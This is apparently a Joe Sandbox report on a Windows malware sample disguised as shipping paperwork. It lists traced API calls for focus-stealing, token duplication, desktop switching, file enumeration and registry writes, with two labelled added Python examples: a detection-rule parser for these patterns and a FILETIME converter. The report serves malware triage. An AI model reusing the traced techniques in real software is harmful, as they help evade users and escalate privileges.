                                                                • Opcode Fuzzy Hash: b1368c0fb087ea5c9d6521e532194d81e83edd2336ceac0d8bd491729a0b5e1f
                                                                • Instruction Fuzzy Hash: 61E0CD7790412857C720D6A89C05FEAB7EDDFC87A0F0441B6FC0CD7304D9609C8086D0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wfsopen
                                                                • String ID:
                                                                • API String ID: 197181222-0
                                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                • Instruction ID: a2f4f25baad626879113f7cb6de0b118a737b9abb2354d91d388791391d5beb0
                                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                • Instruction Fuzzy Hash: 12B0927644020C77CE016A82EC02B493B199B81764F408020FF1C18172A673A6689B8A
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction ID: 3f993f024b550bbd88458c742c27a79ad429d007dc0a577a381053f1d9165727
                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                • Instruction Fuzzy Hash: A7E0BF7494020DEFDB00DFA4D5496DD7BB4EF04301F1045A1FD05D7680DB319E549A62
                                                                APIs
                                                                • Sleep.KERNELBASE(000001F4), ref: 010D88C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10d6000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction ID: 7ed28488680f0bb2e1a10f61cb5e97d752c4b4e1ae7603002aa08aea2315e60b
                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                • Instruction Fuzzy Hash: 98E0E67494020DDFDB00DFB4D5496DD7BB4EF04301F104161FD05D2280D6319D509A62
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 009BCB37
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009BCB95
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BCBD6
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009BCC00
                                                                • SendMessageW.USER32 ref: 009BCC29
                                                                • _wcsncpy.LIBCMT ref: 009BCC95
                                                                • GetKeyState.USER32(00000011), ref: 009BCCB6
                                                                • GetKeyState.USER32(00000009), ref: 009BCCC3
                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009BCCD9
                                                                • GetKeyState.USER32(00000010), ref: 009BCCE3
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009BCD0C
                                                                • SendMessageW.USER32 ref: 009BCD33
                                                                • SendMessageW.USER32(?,00001030,?,009BB348), ref: 009BCE37
                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 009BCE4D
                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009BCE60
                                                                • SetCapture.USER32(?), ref: 009BCE69
                                                                • ClientToScreen.USER32(?,?), ref: 009BCECE
                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009BCEDB
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009BCEF5
                                                                • ReleaseCapture.USER32 ref: 009BCF00
                                                                • GetCursorPos.USER32(?), ref: 009BCF3A
                                                                • ScreenToClient.USER32(?,?), ref: 009BCF47
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 009BCFA3
                                                                • SendMessageW.USER32 ref: 009BCFD1
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 009BD00E
                                                                • SendMessageW.USER32 ref: 009BD03D
                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009BD05E
                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009BD06D
                                                                • GetCursorPos.USER32(?), ref: 009BD08D
                                                                • ScreenToClient.USER32(?,?), ref: 009BD09A
                                                                • GetParent.USER32(?), ref: 009BD0BA
                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 009BD123
                                                                • SendMessageW.USER32 ref: 009BD154
                                                                • ClientToScreen.USER32(?,?), ref: 009BD1B2
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009BD1E2
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 009BD20C
                                                                • SendMessageW.USER32 ref: 009BD22F
                                                                • ClientToScreen.USER32(?,?), ref: 009BD281
                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009BD2B5
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 009BD351
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                • String ID: @GUI_DRAGID$F
                                                                • API String ID: 3977979337-4164748364
                                                                • Opcode ID: 257b09fd08fab48c9fea2aa0f8f0c4afafc2a86e592a0682d48c211b428e14e8
                                                                • Instruction ID: a4e431c08d1bbd82ffacd0d625affc536931e7fed5b01ae617fe530da52fa187
                                                                • Opcode Fuzzy Hash: 257b09fd08fab48c9fea2aa0f8f0c4afafc2a86e592a0682d48c211b428e14e8
                                                                • Instruction Fuzzy Hash: DB42ADB4208745AFD724CF68DA44BAABFE9FF48324F140A19F6958B2B1D731D840EB51
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memmove$_memset
                                                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                • API String ID: 1357608183-1798697756
                                                                • Opcode ID: 9c8bd47063e305b0e4b4d2db47dffbbf0a91bb1a74239ba329d72b8cc9cfa650
                                                                • Instruction ID: dee77018e68b342c048d51a7d9c2a8b3c707cfb3fec92a71cb0f5194d55540fb
                                                                • Opcode Fuzzy Hash: 9c8bd47063e305b0e4b4d2db47dffbbf0a91bb1a74239ba329d72b8cc9cfa650
                                                                • Instruction Fuzzy Hash: B993B071E0421ADFDB24DF98C881BADB7B5FF48710F24856AE945AB381E7749E81CB40
                                                                APIs
                                                                • GetForegroundWindow.USER32(00000000,?), ref: 009348DF
                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096D665
                                                                • IsIconic.USER32(?), ref: 0096D66E
                                                                • ShowWindow.USER32(?,00000009), ref: 0096D67B
                                                                • SetForegroundWindow.USER32(?), ref: 0096D685
                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0096D69B
                                                                • GetCurrentThreadId.KERNEL32 ref: 0096D6A2
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0096D6AE
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0096D6BF
                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0096D6C7
                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0096D6CF
                                                                • SetForegroundWindow.USER32(?), ref: 0096D6D2
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D6E7
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D6F2
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D6FC
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D701
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D70A
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D70F
                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0096D719
                                                                • keybd_event.USER32(00000012,00000000), ref: 0096D71E
                                                                • SetForegroundWindow.USER32(?), ref: 0096D721
                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0096D748
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                • String ID: Shell_TrayWnd
                                                                • API String ID: 4125248594-2988720461
                                                                • Opcode ID: 654a475ec32b94c953acea54d325ea21e9be47f84e2fcb14c833ab8e3fbf0fca
                                                                • Instruction ID: 8ab9e316e6e8dc2e090b1f7df12c726965de85291bc3ddf3071dbb411d0afdfc
                                                                • Opcode Fuzzy Hash: 654a475ec32b94c953acea54d325ea21e9be47f84e2fcb14c833ab8e3fbf0fca
                                                                • Instruction Fuzzy Hash: 3F31A371B51318BBEB202F659D89FBF3F6CEB44B60F104125FA04EA1D1CAB05D01BAA1
                                                                APIs
                                                                  • Part of subcall function 009887E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098882B
                                                                  • Part of subcall function 009887E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00988858
                                                                  • Part of subcall function 009887E1: GetLastError.KERNEL32 ref: 00988865
                                                                • _memset.LIBCMT ref: 00988353
                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009883A5
                                                                • CloseHandle.KERNEL32(?), ref: 009883B6
                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009883CD
                                                                • GetProcessWindowStation.USER32 ref: 009883E6
                                                                • SetProcessWindowStation.USER32(00000000), ref: 009883F0
                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0098840A
                                                                  • Part of subcall function 009881CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00988309), ref: 009881E0
                                                                  • Part of subcall function 009881CB: CloseHandle.KERNEL32(?,?,00988309), ref: 009881F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                • String ID: $default$winsta0
                                                                • API String ID: 2063423040-1027155976
                                                                • Opcode ID: e48a4f6f737a4f7bf147fd4414118596123e473bf0f3004e74e8b31bd25b2a21
                                                                • Instruction ID: fdbd12920ab601d6ded2347535e4f647d389bf9a212c3bf97df78fee196d9dc8
                                                                • Opcode Fuzzy Hash: e48a4f6f737a4f7bf147fd4414118596123e473bf0f3004e74e8b31bd25b2a21
                                                                • Instruction Fuzzy Hash: 1B8169B1904209AFDF11EFA4DD49AEFBBBDEF04314F5441A9F910A6261DB318E15DB20
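The three function listings above that matter most to a triage analyst are the forced-foreground routine (FindWindowW on Shell_TrayWnd, AttachThreadInput, four keybd_event calls with virtual key 0x12, then SetForegroundWindow), the token/desktop routine (DuplicateTokenEx, OpenWindowStationW on winsta0, OpenDesktopW on default, AdjustTokenPrivileges) and the Sleep stub whose dump source is "based on PE: false" at 010D6000, i.e. code running outside any mapped image. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small Python parser for the "APIs" / "Memory Dump Source" listing format used on this page, with rules that flag those three patterns. The sample input is constructed from lines copied from this report. The meaning of the dotted fields in the .sdmp file name (field 5 read as the page protection, field 7 as the region type) is an assumption about the naming scheme, not something the report documents; the Win32 constants PAGE_EXECUTE_READWRITE, MEM_PRIVATE and VK_MENU are standard.

```python
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40   # Win32 page-protection constant
MEM_PRIVATE = 0x20000           # Win32 region-type constant
VK_MENU = 0x12                  # virtual-key code for Alt

# One "• Name.Module(args), ref: addr" line; parens and the leading
# "Part of subcall function XXXX:" prefix are optional, as on the page.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SRC_RE = re.compile(
    r"^•\s+Source File:\s*(?P<dump>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# Constructed sample, assembled from API lines copied from this report.
SAMPLE_REPORT = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0096D665
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0096D6BF
• keybd_event.USER32(00000012,00000000), ref: 0096D6F2
• SetForegroundWindow.USER32(?), ref: 0096D721
Memory Dump Source
• Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009883A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009883CD
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0098840A
Memory Dump Source
• Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
APIs
• Sleep.KERNELBASE(000001F4), ref: 010D88C9
Memory Dump Source
• Source File: 00000000.00000002.1708705720.00000000010D6000.00000040.00000020.00020000.00000000.sdmp, Offset: 010D6000, based on PE: false
"""

# Each rule: every listed API must appear in the same function block.
RULES = {
    "force-foreground (AttachThreadInput + synthetic Alt keypress)":
        {"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
    "token duplication + window-station/desktop switch (RunAs-style)":
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
}


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)   # (name, module, [args], ref)
    dump: str = ""
    backed_by_pe: bool = True


def parse_blocks(text):
    """Split the listing into function blocks, one per 'APIs' header."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(s)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.calls.append((m["name"], m["module"], args, m["ref"]))
            continue
        m = SRC_RE.match(s)
        if m:
            cur.dump, cur.backed_by_pe = m["dump"], m["pe"] == "true"
    return blocks


def dump_region_flags(dump_name):
    """ASSUMPTION about the .sdmp naming scheme: dotted field 5 is the page
    protection and field 7 the region type, both hexadecimal."""
    fields = dump_name[: -len(".sdmp")].split(".")
    return int(fields[4], 16), int(fields[6], 16)


def _hex(arg):
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def analyze(text):
    """Return (finding, reference address) pairs for every matched rule."""
    findings = []
    for b in parse_blocks(text):
        if not b.calls:
            continue
        names = {c[0] for c in b.calls}
        for label, needed in RULES.items():
            if needed <= names:
                findings.append((label, b.calls[0][3]))
        for name, _mod, args, ref in b.calls:
            if name == "keybd_event" and args and _hex(args[0]) == VK_MENU:
                findings.append(("synthetic Alt (VK_MENU) keypress", ref))
                break
        if not b.backed_by_pe and b.dump:
            protect, rtype = dump_region_flags(b.dump)
            if protect == PAGE_EXECUTE_READWRITE and rtype == MEM_PRIVATE:
                findings.append(("code running from RWX private memory, not PE-backed", b.calls[0][3]))
    return findings


def run_sample():
    return analyze(SAMPLE_REPORT)


if __name__ == "__main__":
    for label, ref in run_sample():
        print(f"{ref}: {label}")
```

The rules are deliberately per-block: AttachThreadInput or keybd_event on their own are common in legitimate GUI code, and the AutoIt runtime that this binary is compiled from uses exactly this sequence for its window-activation routine, so the signal is the combination plus the fact that the payload later executes from an unbacked RWX region. Treating the forced-foreground and RunAs-style blocks as "AutoIt runtime present" and the unbacked Sleep stub as "injected stage present" keeps the two observations separate when writing a report.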
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099C78D
                                                                • FindClose.KERNEL32(00000000), ref: 0099C7E1
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0099C806
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0099C81D
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0099C844
                                                                • __swprintf.LIBCMT ref: 0099C890
                                                                • __swprintf.LIBCMT ref: 0099C8D3
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • __swprintf.LIBCMT ref: 0099C927
                                                                  • Part of subcall function 00953698: __woutput_l.LIBCMT ref: 009536F1
                                                                • __swprintf.LIBCMT ref: 0099C975
                                                                  • Part of subcall function 00953698: __flsbuf.LIBCMT ref: 00953713
                                                                  • Part of subcall function 00953698: __flsbuf.LIBCMT ref: 0095372B
                                                                • __swprintf.LIBCMT ref: 0099C9C4
                                                                • __swprintf.LIBCMT ref: 0099CA13
                                                                • __swprintf.LIBCMT ref: 0099CA62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                • API String ID: 3953360268-2428617273
                                                                • Opcode ID: a294e286842d201664af3b4a5f0cbcb56761a11fa71333fb2ccf557636b16d24
                                                                • Instruction ID: 4faeae17acc7a21176e9b6fb16f5da71574b10ac63d0e0c5dfff5e78b9d308a9
                                                                • Opcode Fuzzy Hash: a294e286842d201664af3b4a5f0cbcb56761a11fa71333fb2ccf557636b16d24
                                                                • Instruction Fuzzy Hash: BCA13DB2408304ABD710EFA5CD86EAFB7ECFFD8704F400919F59586191EA70DA08CB62
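The routine above reads the FILETIME fields that FindFirstFileW returns, converts them with FileTimeToLocalFileTime and FileTimeToSystemTime, and prints them with the "%4d%02d%02d%02d%02d%02d" format, i.e. a YYYYMMDDHHMMSS timestamp. The following script is an added example, not code from the sample or from the AutoIt runtime, that reproduces the same conversion in pure Python so a raw FILETIME taken from a dump or an MFT record can be rendered in that form off-box. The UTC-offset parameter stands in for FileTimeToLocalFileTime and is an assumption of this example; the sample itself uses the analysis machine's local zone.

```python
"""Added example: Windows FILETIME to the YYYYMMDDHHMMSS string used by the
routine at 0099C78D.  Illustrative code, not taken from the sample.
"""
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# Distance from the FILETIME epoch to the Unix epoch, in 100 ns units.
_EPOCH_DIFF_100NS = 116444736000000000


def filetime_from_parts(low: int, high: int) -> int:
    """Join dwLowDateTime/dwHighDateTime as laid out in WIN32_FIND_DATAW."""
    if not (0 <= low <= 0xFFFFFFFF and 0 <= high <= 0xFFFFFFFF):
        raise ValueError("FILETIME halves must be 32-bit unsigned values")
    return (high << 32) | low


def filetime_to_datetime(filetime: int, utc_offset_hours: int = 0) -> datetime:
    """FileTimeToSystemTime equivalent.

    utc_offset_hours plays the role of FileTimeToLocalFileTime; 0 keeps UTC,
    which is what you want when correlating with other evidence.
    """
    if filetime < 0:
        raise ValueError("FILETIME is unsigned")
    # Integer division: FILETIME has 100 ns resolution, datetime only 1 us.
    utc = _FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return utc.astimezone(timezone(timedelta(hours=utc_offset_hours)))


def format_like_sample(filetime: int, utc_offset_hours: int = 0) -> str:
    """Produce the "%4d%02d%02d%02d%02d%02d" string seen in the routine."""
    dt = filetime_to_datetime(filetime, utc_offset_hours)
    return "%4d%02d%02d%02d%02d%02d" % (
        dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)


def parse_sample_format(text: str) -> datetime:
    """Reverse direction, for reading such strings back out of scripts or logs.

    The string carries no zone, so the caller must know which zone produced it;
    this helper assumes UTC.
    """
    if len(text) != 14 or not text.isdigit():
        raise ValueError("expected 14 digits, YYYYMMDDHHMMSS")
    return datetime.strptime(text, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def filetime_to_unix(filetime: int) -> float:
    """Seconds since 1970-01-01 UTC, for tools that speak Unix time."""
    return (filetime - _EPOCH_DIFF_100NS) / 10_000_000


if __name__ == "__main__":
    # Constructed sample input: the Unix epoch expressed as FILETIME halves.
    ft = filetime_from_parts(0xD53E8000, 0x019DB1DE)
    print(ft, format_like_sample(ft), filetime_to_unix(ft))
```

Because the formatted string drops the zone, two machines in different zones produce different strings for the same FILETIME; keep the raw 64-bit value alongside the rendered form when you record it.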
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099EFB6
                                                                • _wcscmp.LIBCMT ref: 0099EFCB
                                                                • _wcscmp.LIBCMT ref: 0099EFE2
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0099EFF4
                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0099F00E
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099F026
                                                                • FindClose.KERNEL32(00000000), ref: 0099F031
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0099F04D
                                                                • _wcscmp.LIBCMT ref: 0099F074
                                                                • _wcscmp.LIBCMT ref: 0099F08B
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099F09D
                                                                • SetCurrentDirectoryW.KERNEL32(009E8920), ref: 0099F0BB
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099F0C5
                                                                • FindClose.KERNEL32(00000000), ref: 0099F0D2
                                                                • FindClose.KERNEL32(00000000), ref: 0099F0E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                • String ID: *.*
                                                                • API String ID: 1803514871-438819550
                                                                • Opcode ID: 7579e752b04ec4c13f8586a74cb1edbf1a2ba1d5a923cb9691a5b96d63ea8aa7
                                                                • Instruction ID: c263244175af10432ed6c74503030c1101352fea02b7bd2b78ef9052497ee3e0
                                                                • Opcode Fuzzy Hash: 7579e752b04ec4c13f8586a74cb1edbf1a2ba1d5a923cb9691a5b96d63ea8aa7
                                                                • Instruction Fuzzy Hash: 5631E3325042186BDF14DBB9EC68AEEB7AC9F88361F144276F814E2091EB70DE44DB61
                                                                APIs
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B0953
                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,009BF910,00000000,?,00000000,?,?), ref: 009B09C1
                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009B0A09
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009B0A92
                                                                • RegCloseKey.ADVAPI32(?), ref: 009B0DB2
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B0DBF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmp
